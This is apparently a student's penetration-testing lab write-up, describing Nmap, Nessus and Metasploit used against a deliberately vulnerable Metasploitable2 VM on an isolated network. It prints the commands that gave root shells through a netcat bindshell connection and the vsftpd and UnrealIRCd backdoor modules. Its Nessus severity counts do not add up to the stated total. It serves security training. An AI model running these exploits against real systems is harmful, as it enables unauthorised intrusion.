Share
## https://sploitus.com/exploit?id=344AF37C-35F5-5A70-83E4-B89507233DC0
# Project 7 โ€” Nessus Vulnerability Assessment + Metasploit Exploitation

## Objective
Conduct a full penetration test against Metasploitable2 using professional tools and methodology โ€” Nessus for vulnerability assessment, Metasploit for exploitation, and documented findings in a formal pentest report.

---

## Lab Environment

| Component | Details |
|---|---|
| Attacker | Kali Linux 2026.1 โ€” 192.168.56.102 |
| Target | Metasploitable2 โ€” 192.168.56.101 |
| Network | VirtualBox Host-Only (isolated, no internet exposure) |
| Scanner | Nessus Essentials 10.12.0 |
| Exploit Framework | Metasploit 6.4.116 |

---

## Methodology

```
Reconnaissance โ†’ Nmap service scan
      โ†“
Vulnerability Assessment โ†’ Nessus scan (69 findings, 10 Critical)
      โ†“
Manual CVE Research โ†’ vsftpd, UnrealIRCd, Bindshell
      โ†“
Exploitation โ†’ Metasploit + netcat
      โ†“
Post-Exploitation โ†’ Root access confirmed ร— 3
      โ†“
Reporting โ†’ Professional pentest report
```

---

## Reconnaissance Results

**Command:** `nmap -sV 192.168.56.101`

23 open ports identified including:
- 21/tcp โ€” vsftpd 2.3.4 (CVE-2011-2523 backdoor)
- 22/tcp โ€” OpenSSH 4.7p1
- 23/tcp โ€” Telnet (cleartext)
- 80/tcp โ€” Apache 2.2.8
- 1524/tcp โ€” Bindshell (open root shell)
- 5900/tcp โ€” VNC (password: "password")
- 6667/tcp โ€” UnrealIRCd (CVE-2010-2075 backdoor)

---

## Nessus Scan Results

| Severity | Count |
|---|---|
| Critical | 10 |
| High | 6 |
| Medium | 24 |
| Low | 9 |
| Info | 140 |
| **Total** | **69** |

Scan duration: 18 minutes

---

## Exploits Executed

### 1. Bind Shell Backdoor โ€” Port 1524
```bash
nc 192.168.56.101 1524
whoami  # โ†’ root
```
No credentials. No exploit. Just connect.

### 2. vsftpd 2.3.4 Backdoor โ€” CVE-2011-2523
```
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
run
# โ†’ Meterpreter session opened as root
```

### 3. UnrealIRCd Backdoor โ€” CVE-2010-2075
```
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
run
# โ†’ root shell, uid=0(root) gid=0(root)
```

---

## Results

All 3 exploits achieved **root access** with no credentials required.

| Exploit | CVE | Result |
|---|---|---|
| Bind Shell (port 1524) | โ€” | Root shell via netcat |
| vsftpd 2.3.4 | CVE-2011-2523 | Meterpreter root session |
| UnrealIRCd 3.2.8.1 | CVE-2010-2075 | Meterpreter root session |

---
## Full Report

See [report/pentest_report.md](report/pentest_report.md) for complete findings, CVSS scores, and remediation recommendations.

---

## Key Learnings

- Manual CVE research before running tools โ€” identified vsftpd and UnrealIRCd backdoors from version numbers alone
- Nessus confirmed manual findings and added 60+ additional findings
- Port 1524 (bindshell) was visible in Nmap as "Metasploitable root shell" โ€” version detection is critical
- Three root shells via three different vectors โ€” real attacker needs only one
- Supply chain attacks (vsftpd, UnrealIRCd) are more dangerous than misconfigurations โ€” backdoors in legitimate software

## Skills Demonstrated

- Nmap reconnaissance and service fingerprinting
- Nessus vulnerability scanning and report analysis
- CVE research and manual vulnerability identification
- Metasploit framework โ€” search, configure, exploit
- Meterpreter post-exploitation
- CVSS scoring and risk prioritisation
- Professional pentest report writing